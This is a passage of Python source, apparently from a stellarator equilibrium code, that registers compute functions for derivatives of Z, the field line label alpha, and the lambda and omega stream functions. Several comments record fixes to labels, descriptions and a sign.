    units_long="meters",
    description="Vertical coordinate in lab frame, third derivative, wrt radius "
    "twice and toroidal angle",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[2, 0, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rrz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of Z: two radial, one toroidal."""
    coeffs = params["Z_lmn"]
    data["Z_rrz"] = transforms["Z"].transform(coeffs, 2, 0, 1)
    return data
@register_compute_fun(
    name="Z_rrzz",
    label="\\partial_{\\rho \\rho \\zeta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, fourth derivative, wrt radius "
    "twice and toroidal angle twice",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[2, 0, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rrzz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of Z: two radial, two toroidal."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 2, 0, 2)
    data["Z_rrzz"] = deriv
    return data
@register_compute_fun(
    name="Z_rt",
    label="\\partial_{\\rho \\theta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, second derivative wrt radius "
    "and poloidal angle",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 1, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rt(params, transforms, profiles, data, **kwargs):
    """Mixed second derivative of Z wrt rho and theta."""
    coeffs = params["Z_lmn"]
    data["Z_rt"] = transforms["Z"].transform(coeffs, 1, 1, 0)
    return data
@register_compute_fun(
    name="Z_rtt",
    label="\\partial_{\\rho \\theta \\theta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, third derivative wrt radius "
    "and poloidal angle twice",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 2, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rtt(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of Z: one radial, two poloidal."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 1, 2, 0)
    data["Z_rtt"] = deriv
    return data
@register_compute_fun(
    name="Z_rttt",
    label="\\partial_{\\rho \\theta \\theta \\theta} Z",
    units="m",
    units_long="meters",
    # fix: 1 radial + 3 poloidal derivatives is a FOURTH derivative, not third
    # (matches the R_rttt description)
    description="Vertical coordinate in lab frame, fourth derivative wrt radius "
    "and poloidal angle thrice",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 3, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rttt(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of Z: one radial, three poloidal."""
    data["Z_rttt"] = transforms["Z"].transform(params["Z_lmn"], 1, 3, 0)
    return data
@register_compute_fun(
    name="Z_rttz",
    label="\\partial_{\\rho \\theta \\theta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, fourth derivative wrt radius "
    "once, poloidal angle twice, and toroidal angle once",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 2, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rttz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of Z: one radial, two poloidal, one toroidal."""
    coeffs = params["Z_lmn"]
    data["Z_rttz"] = transforms["Z"].transform(coeffs, 1, 2, 1)
    return data
@register_compute_fun(
    name="Z_rtz",
    label="\\partial_{\\rho \\theta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, third derivative wrt radius, "
    "poloidal angle, and toroidal angle",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 1, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rtz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of Z: one radial, one poloidal, one toroidal."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 1, 1, 1)
    data["Z_rtz"] = deriv
    return data
@register_compute_fun(
    name="Z_rtzz",
    label="\\partial_{\\rho \\theta \\zeta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, fourth derivative wrt radius, "
    "poloidal angle, and toroidal angle twice",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 1, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rtzz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of Z: one radial, one poloidal, two toroidal."""
    coeffs = params["Z_lmn"]
    data["Z_rtzz"] = transforms["Z"].transform(coeffs, 1, 1, 2)
    return data
@register_compute_fun(
    name="Z_rz",
    label="\\partial_{\\rho \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, second derivative wrt radius "
    "and toroidal angle",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 0, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rz(params, transforms, profiles, data, **kwargs):
    """Mixed second derivative of Z wrt rho and zeta."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 1, 0, 1)
    data["Z_rz"] = deriv
    return data
@register_compute_fun(
    name="Z_rzz",
    label="\\partial_{\\rho \\zeta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, third derivative wrt radius "
    "and toroidal angle twice",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 0, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rzz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of Z: one radial, two toroidal."""
    coeffs = params["Z_lmn"]
    data["Z_rzz"] = transforms["Z"].transform(coeffs, 1, 0, 2)
    return data
@register_compute_fun(
    name="Z_rzzz",
    label="\\partial_{\\rho \\zeta \\zeta \\zeta} Z",
    units="m",
    units_long="meters",
    # fix: 1 radial + 3 toroidal derivatives is a FOURTH derivative, not third
    # (matches the R_rzzz description)
    description="Vertical coordinate in lab frame, fourth derivative wrt radius "
    "and toroidal angle thrice",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[1, 0, 3]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_rzzz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of Z: one radial, three toroidal."""
    data["Z_rzzz"] = transforms["Z"].transform(params["Z_lmn"], 1, 0, 3)
    return data
@register_compute_fun(
    name="Z_t",
    label="\\partial_{\\theta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, first poloidal derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 1, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_t(params, transforms, profiles, data, **kwargs):
    """First poloidal derivative of the vertical coordinate Z."""
    coeffs = params["Z_lmn"]
    data["Z_t"] = transforms["Z"].transform(coeffs, 0, 1, 0)
    return data
@register_compute_fun(
    name="Z_tt",
    label="\\partial_{\\theta \\theta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, second poloidal derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 2, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_tt(params, transforms, profiles, data, **kwargs):
    """Second poloidal derivative of the vertical coordinate Z."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 0, 2, 0)
    data["Z_tt"] = deriv
    return data
@register_compute_fun(
    name="Z_ttt",
    label="\\partial_{\\theta \\theta \\theta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, third poloidal derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 3, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_ttt(params, transforms, profiles, data, **kwargs):
    """Third poloidal derivative of the vertical coordinate Z."""
    coeffs = params["Z_lmn"]
    data["Z_ttt"] = transforms["Z"].transform(coeffs, 0, 3, 0)
    return data
@register_compute_fun(
    name="Z_ttz",
    label="\\partial_{\\theta \\theta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, third derivative wrt poloidal "
    "angle twice and toroidal angle",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 2, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_ttz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of Z: two poloidal, one toroidal."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 0, 2, 1)
    data["Z_ttz"] = deriv
    return data
@register_compute_fun(
    name="Z_tz",
    label="\\partial_{\\theta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, second derivative wrt poloidal "
    "and toroidal angles",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 1, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_tz(params, transforms, profiles, data, **kwargs):
    """Mixed second derivative of Z wrt theta and zeta."""
    coeffs = params["Z_lmn"]
    data["Z_tz"] = transforms["Z"].transform(coeffs, 0, 1, 1)
    return data
@register_compute_fun(
    name="Z_tzz",
    label="\\partial_{\\theta \\zeta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, third derivative wrt poloidal "
    "angle and toroidal angle twice",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 1, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_tzz(params, transforms, profiles, data, **kwargs):
    """Mixed third derivative of Z: one poloidal, two toroidal."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 0, 1, 2)
    data["Z_tzz"] = deriv
    return data
@register_compute_fun(
    name="Z_z",
    label="\\partial_{\\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, first toroidal derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 0, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_z(params, transforms, profiles, data, **kwargs):
    """First toroidal derivative of the vertical coordinate Z."""
    coeffs = params["Z_lmn"]
    data["Z_z"] = transforms["Z"].transform(coeffs, 0, 0, 1)
    return data
@register_compute_fun(
    name="Z_zz",
    label="\\partial_{\\zeta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, second toroidal derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 0, 2]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_zz(params, transforms, profiles, data, **kwargs):
    """Second toroidal derivative of the vertical coordinate Z."""
    deriv = transforms["Z"].transform(params["Z_lmn"], 0, 0, 2)
    data["Z_zz"] = deriv
    return data
@register_compute_fun(
    name="Z_zzz",
    label="\\partial_{\\zeta \\zeta \\zeta} Z",
    units="m",
    units_long="meters",
    description="Vertical coordinate in lab frame, third toroidal derivative",
    dim=1,
    params=["Z_lmn"],
    transforms={"Z": [[0, 0, 3]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _Z_zzz(params, transforms, profiles, data, **kwargs):
    """Third toroidal derivative of the vertical coordinate Z."""
    coeffs = params["Z_lmn"]
    data["Z_zzz"] = transforms["Z"].transform(coeffs, 0, 0, 3)
    return data
@register_compute_fun(
    name="alpha",
    label="\\alpha",
    units="~",
    units_long="None",
    description="Field line label, defined on [0, 2pi)",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["theta_PEST", "zeta", "iota"],
)
def _alpha(params, transforms, profiles, data, **kwargs):
    """Field line label alpha = theta_PEST - iota * zeta, wrapped into [0, 2pi)."""
    raw = data["theta_PEST"] - data["iota"] * data["zeta"]
    data["alpha"] = raw % (2 * jnp.pi)
    return data
@register_compute_fun(
    name="alpha_r",
    label="\\partial_\\rho \\alpha",
    units="~",
    units_long="None",
    description="Field line label, derivative wrt radial coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["theta_PEST_r", "phi", "phi_r", "iota", "iota_r"],
)
def _alpha_r(params, transforms, profiles, data, **kwargs):
    """Radial derivative of alpha, via the product rule on the iota * phi term."""
    iota_phi_r = data["iota_r"] * data["phi"] + data["iota"] * data["phi_r"]
    data["alpha_r"] = data["theta_PEST_r"] - iota_phi_r
    return data
@register_compute_fun(
    name="alpha_t",
    label="\\partial_\\theta \\alpha",
    units="~",
    units_long="None",
    description="Field line label, derivative wrt poloidal coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["theta_PEST_t", "phi_t", "iota"],
)
def _alpha_t(params, transforms, profiles, data, **kwargs):
    """Poloidal derivative of the field line label alpha.

    alpha = theta_PEST - iota * zeta (see _alpha), and iota is a flux function
    (no theta dependence), so d(alpha)/dtheta = theta_PEST_t - iota * phi_t.
    """
    # fix: original used "+", inconsistent with the alpha definition and with
    # the minus signs in _alpha_r and _alpha_z.
    data["alpha_t"] = data["theta_PEST_t"] - data["iota"] * data["phi_t"]
    return data
@register_compute_fun(
    name="alpha_z",
    label="\\partial_\\zeta \\alpha",
    units="~",
    units_long="None",
    description="Field line label, derivative wrt toroidal coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["theta_PEST_z", "phi_z", "iota"],
)
def _alpha_z(params, transforms, profiles, data, **kwargs):
    """Toroidal derivative of alpha = theta_PEST - iota * zeta."""
    twist = data["iota"] * data["phi_z"]
    data["alpha_z"] = data["theta_PEST_z"] - twist
    return data
@register_compute_fun(
    name="lambda",
    label="\\lambda",
    units="rad",
    units_long="radians",
    description="Poloidal stream function",
    dim=1,
    params=["L_lmn"],
    transforms={"L": [[0, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _lambda(params, transforms, profiles, data, **kwargs):
    """Evaluate the poloidal stream function lambda from its spectral coefficients."""
    coeffs = params["L_lmn"]
    data["lambda"] = transforms["L"].transform(coeffs, 0, 0, 0)
    return data
@register_compute_fun(
    name="lambda_r",
    label="\\partial_{\\rho} \\lambda",
    units="rad",
    units_long="radians",
    description="Poloidal stream function, first radial derivative",
    dim=1,
    params=["L_lmn"],
    transforms={"L": [[1, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _lambda_r(params, transforms, profiles, data, **kwargs):
    """First radial derivative of the poloidal stream function lambda."""
    deriv = transforms["L"].transform(params["L_lmn"], 1, 0, 0)
    data["lambda_r"] = deriv
    return data
@register_compute_fun(
    name="lambda_rr",
    label="\\partial_{\\rho \\rho} \\lambda",
    units="rad",
    units_long="radians",
    description="Poloidal stream function, second radial derivative",
    dim=1,
    params=["L_lmn"],
    transforms={"L": [[2, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _lambda_rr(params, transforms, profiles, data, **kwargs):
    """Second radial derivative of the poloidal stream function lambda."""
    coeffs = params["L_lmn"]
    data["lambda_rr"] = transforms["L"].transform(coeffs, 2, 0, 0)
    return data
@register_compute_fun(
    name="lambda_rrr",
    # fix: "\rho" in a non-raw string is the escape "\r" + "ho"; must be "\\rho"
    label="\\partial_{\\rho \\rho \\rho} \\lambda",
    units="rad",
    units_long="radians",
    description="Poloidal stream function, third radial derivative",
    dim=1,
    params=["L_lmn"],
    transforms={"L": [[3, 0, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _lambda_rrr(params, transforms, profiles, data, **kwargs):
    """Third radial derivative of the poloidal stream function lambda."""
    data["lambda_rrr"] = transforms["L"].transform(params["L_lmn"], 3, 0, 0)
    return data
@register_compute_fun(
    name="lambda_rrrt",
    # fix: "\rho" in a non-raw string is the escape "\r" + "ho"; must be "\\rho"
    label="\\partial_{\\rho \\rho \\rho \\theta} \\lambda",
    units="rad",
    units_long="radians",
    description="Poloidal stream function, third radial derivative and"
    " first poloidal derivative",
    dim=1,
    params=["L_lmn"],
    transforms={"L": [[3, 1, 0]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _lambda_rrrt(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of lambda: three radial, one poloidal."""
    data["lambda_rrrt"] = transforms["L"].transform(params["L_lmn"], 3, 1, 0)
    return data
@register_compute_fun(
    name="lambda_rrrz",
    # fix: "\rho" in a non-raw string is the escape "\r" + "ho"; must be "\\rho"
    label="\\partial_{\\rho \\rho \\rho \\zeta} \\lambda",
    units="rad",
    units_long="radians",
    description="Poloidal stream function, third radial derivative and"
    " first toroidal derivative",
    dim=1,
    params=["L_lmn"],
    transforms={"L": [[3, 0, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _lambda_rrrz(params, transforms, profiles, data, **kwargs):
    """Mixed fourth derivative of lambda: three radial, one toroidal."""
    data["lambda_rrrz"] = transforms["L"].transform(params["L_lmn"], 3, 0, 1)
    return data
@register_compute_fun(
name="lambda_rrt",
label="\\partial_{\\rho \\rho \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative, wrt radius twice "
"and poloidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[2, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rrt(params, transforms, profiles, data, **kwargs):
data["lambda_rrt"] = transforms["L"].transform(params["L_lmn"], 2, 1, 0)
return data
@register_compute_fun(
name="lambda_rrz",
label="\\partial_{\\rho \\rho \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative, wrt radius twice "
"and toroidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[2, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rrz(params, transforms, profiles, data, **kwargs):
data["lambda_rrz"] = transforms["L"].transform(params["L_lmn"], 2, 0, 1)
return data
@register_compute_fun(
name="lambda_rt",
label="\\partial_{\\rho \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second derivative wrt radius and "
"poloidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rt(params, transforms, profiles, data, **kwargs):
data["lambda_rt"] = transforms["L"].transform(params["L_lmn"], 1, 1, 0)
return data
@register_compute_fun(
name="lambda_rtt",
label="\\partial_{\\rho \\theta \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative wrt radius and "
"poloidal angle twice",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rtt(params, transforms, profiles, data, **kwargs):
data["lambda_rtt"] = transforms["L"].transform(params["L_lmn"], 1, 2, 0)
return data
@register_compute_fun(
    name="lambda_rtz",
    label="\\partial_{\\rho \\theta \\zeta} \\lambda",
    units="rad",
    units_long="radians",
    # Fixed description: trailing + leading space across the string
    # concatenation produced a double space ("poloidal  angle").
    description="Poloidal stream function, third derivative wrt radius, poloidal "
    "angle, and toroidal angle",
    dim=1,
    params=["L_lmn"],
    transforms={"L": [[1, 1, 1]]},
    profiles=[],
    coordinates="rtz",
    data=[],
)
def _lambda_rtz(params, transforms, profiles, data, **kwargs):
    """Compute d^3(lambda)/(d(rho) d(theta) d(zeta)) via spectral transform of L_lmn."""
    data["lambda_rtz"] = transforms["L"].transform(params["L_lmn"], 1, 1, 1)
    return data
@register_compute_fun(
name="lambda_rz",
label="\\partial_{\\rho \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second derivative wrt radius and "
"toroidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rz(params, transforms, profiles, data, **kwargs):
data["lambda_rz"] = transforms["L"].transform(params["L_lmn"], 1, 0, 1)
return data
@register_compute_fun(
name="lambda_rzz",
label="\\partial_{\\rho \\zeta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative wrt radius and "
"toroidal angle twice",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rzz(params, transforms, profiles, data, **kwargs):
data["lambda_rzz"] = transforms["L"].transform(params["L_lmn"], 1, 0, 2)
return data
@register_compute_fun(
name="lambda_t",
label="\\partial_{\\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, first poloidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_t(params, transforms, profiles, data, **kwargs):
data["lambda_t"] = transforms["L"].transform(params["L_lmn"], 0, 1, 0)
return data
@register_compute_fun(
name="lambda_tt",
label="\\partial_{\\theta \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second poloidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_tt(params, transforms, profiles, data, **kwargs):
data["lambda_tt"] = transforms["L"].transform(params["L_lmn"], 0, 2, 0)
return data
@register_compute_fun(
name="lambda_ttt",
label="\\partial_{\\theta \\theta \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third poloidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 3, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_ttt(params, transforms, profiles, data, **kwargs):
data["lambda_ttt"] = transforms["L"].transform(params["L_lmn"], 0, 3, 0)
return data
@register_compute_fun(
name="lambda_ttz",
label="\\partial_{\\theta \\theta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative wrt poloidal angle "
"twice and toroidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 2, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_ttz(params, transforms, profiles, data, **kwargs):
data["lambda_ttz"] = transforms["L"].transform(params["L_lmn"], 0, 2, 1)
return data
@register_compute_fun(
name="lambda_tz",
label="\\partial_{\\theta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second derivative wrt poloidal and "
"toroidal angles",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 1, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_tz(params, transforms, profiles, data, **kwargs):
data["lambda_tz"] = transforms["L"].transform(params["L_lmn"], 0, 1, 1)
return data
@register_compute_fun(
name="lambda_tzz",
label="\\partial_{\\theta \\zeta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative wrt poloidal angle "
"and toroidal angle twice",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 1, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_tzz(params, transforms, profiles, data, **kwargs):
data["lambda_tzz"] = transforms["L"].transform(params["L_lmn"], 0, 1, 2)
return data
@register_compute_fun(
name="lambda_z",
label="\\partial_{\\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, first toroidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_z(params, transforms, profiles, data, **kwargs):
data["lambda_z"] = transforms["L"].transform(params["L_lmn"], 0, 0, 1)
return data
@register_compute_fun(
name="lambda_zz",
label="\\partial_{\\zeta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second toroidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_zz(params, transforms, profiles, data, **kwargs):
data["lambda_zz"] = transforms["L"].transform(params["L_lmn"], 0, 0, 2)
return data
@register_compute_fun(
name="lambda_zzz",
label="\\partial_{\\zeta \\zeta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third toroidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 0, 3]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_zzz(params, transforms, profiles, data, **kwargs):
data["lambda_zzz"] = transforms["L"].transform(params["L_lmn"], 0, 0, 3)
return data
@register_compute_fun(
name="omega",
label="\\omega",
units="rad",
units_long="radians",
description="Toroidal stream function",
dim=1,
params=[], # ["W_lmn"],
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega(params, transforms, profiles, data, **kwargs):
data["omega"] = data["0"]
return data
@register_compute_fun(
name="omega_r",
label="\\partial_{\\rho} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, first radial derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_r(params, transforms, profiles, data, **kwargs):
data["omega_r"] = data["0"]
return data
@register_compute_fun(
name="omega_rr",
label="\\partial_{\\rho \\rho} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second radial derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rr(params, transforms, profiles, data, **kwargs):
data["omega_rr"] = data["0"]
return data
@register_compute_fun(
    name="omega_rrr",
    # Fixed LaTeX label: "\rho" in a non-raw string is a carriage-return
    # escape; it must be written "\\rho".
    label="\\partial_{\\rho \\rho \\rho} \\omega",
    units="rad",
    units_long="radians",
    description="Toroidal stream function, third radial derivative",
    dim=1,
    params=[],  # ["W_lmn"]
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["0"],
)
def _omega_rrr(params, transforms, profiles, data, **kwargs):
    """Third radial derivative of omega; identically zero (W_lmn unsupported)."""
    data["omega_rrr"] = data["0"]
    return data
@register_compute_fun(
    name="omega_rrrr",
    # Fixed LaTeX label: "\rho" in a non-raw string is a carriage-return
    # escape; it must be written "\\rho".
    label="\\partial_{\\rho \\rho \\rho \\rho} \\omega",
    units="rad",
    units_long="radians",
    description="Toroidal stream function, fourth radial derivative",
    dim=1,
    params=[],  # ["W_lmn"]
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["0"],
)
def _omega_rrrr(params, transforms, profiles, data, **kwargs):
    """Fourth radial derivative of omega; identically zero (W_lmn unsupported)."""
    data["omega_rrrr"] = data["0"]
    return data
@register_compute_fun(
    name="omega_rrrt",
    # Fixed LaTeX label: "\rho" in a non-raw string is a carriage-return
    # escape; it must be written "\\rho".
    label="\\partial_{\\rho \\rho \\rho \\theta} \\omega",
    units="rad",
    units_long="radians",
    description="Toroidal stream function, fourth derivative wrt radial coordinate"
    " thrice and poloidal once",
    dim=1,
    params=[],  # ["W_lmn"]
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["0"],
)
def _omega_rrrt(params, transforms, profiles, data, **kwargs):
    """d^4(omega)/(d(rho)^3 d(theta)); identically zero (W_lmn unsupported)."""
    data["omega_rrrt"] = data["0"]
    return data
@register_compute_fun(
    name="omega_rrrz",
    # Fixed LaTeX label: "\rho" in a non-raw string is a carriage-return
    # escape; it must be written "\\rho".
    label="\\partial_{\\rho \\rho \\rho \\zeta} \\omega",
    units="rad",
    units_long="radians",
    description="Toroidal stream function, fourth derivative wrt radial coordinate"
    " thrice and toroidal once",
    dim=1,
    params=[],  # ["W_lmn"]
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["0"],
)
def _omega_rrrz(params, transforms, profiles, data, **kwargs):
    """d^4(omega)/(d(rho)^3 d(zeta)); identically zero (W_lmn unsupported)."""
    data["omega_rrrz"] = data["0"]
    return data
@register_compute_fun(
name="omega_rrt",
label="\\partial_{\\rho \\rho \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative, wrt radius twice "
"and poloidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrt(params, transforms, profiles, data, **kwargs):
data["omega_rrt"] = data["0"]
return data
@register_compute_fun(
name="omega_rrtt",
label="\\partial_{\\rho \\rho \\theta \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative, wrt radius twice "
"and poloidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrtt(params, transforms, profiles, data, **kwargs):
data["omega_rrtt"] = data["0"]
return data
@register_compute_fun(
    name="omega_rrtz",
    # Fixed label: this is the fourth derivative (rho twice, theta, zeta);
    # the label previously omitted the second \\rho.
    label="\\partial_{\\rho \\rho \\theta \\zeta} \\omega",
    units="rad",
    units_long="radians",
    description="Toroidal stream function, fourth derivative wrt radius twice,"
    " poloidal angle, and toroidal angle",
    dim=1,
    params=[],  # ["W_lmn"]
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["0"],
)
def _omega_rrtz(params, transforms, profiles, data, **kwargs):
    """d^4(omega)/(d(rho)^2 d(theta) d(zeta)); identically zero (W_lmn unsupported)."""
    data["omega_rrtz"] = data["0"]
    return data
@register_compute_fun(
name="omega_rrz",
label="\\partial_{\\rho \\rho \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative, wrt radius twice "
"and toroidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrz(params, transforms, profiles, data, **kwargs):
data["omega_rrz"] = data["0"]
return data
@register_compute_fun(
name="omega_rrzz",
label="\\partial_{\\rho \\rho \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative, wrt radius twice "
"and toroidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrzz(params, transforms, profiles, data, **kwargs):
data["omega_rrzz"] = data["0"]
return data
@register_compute_fun(
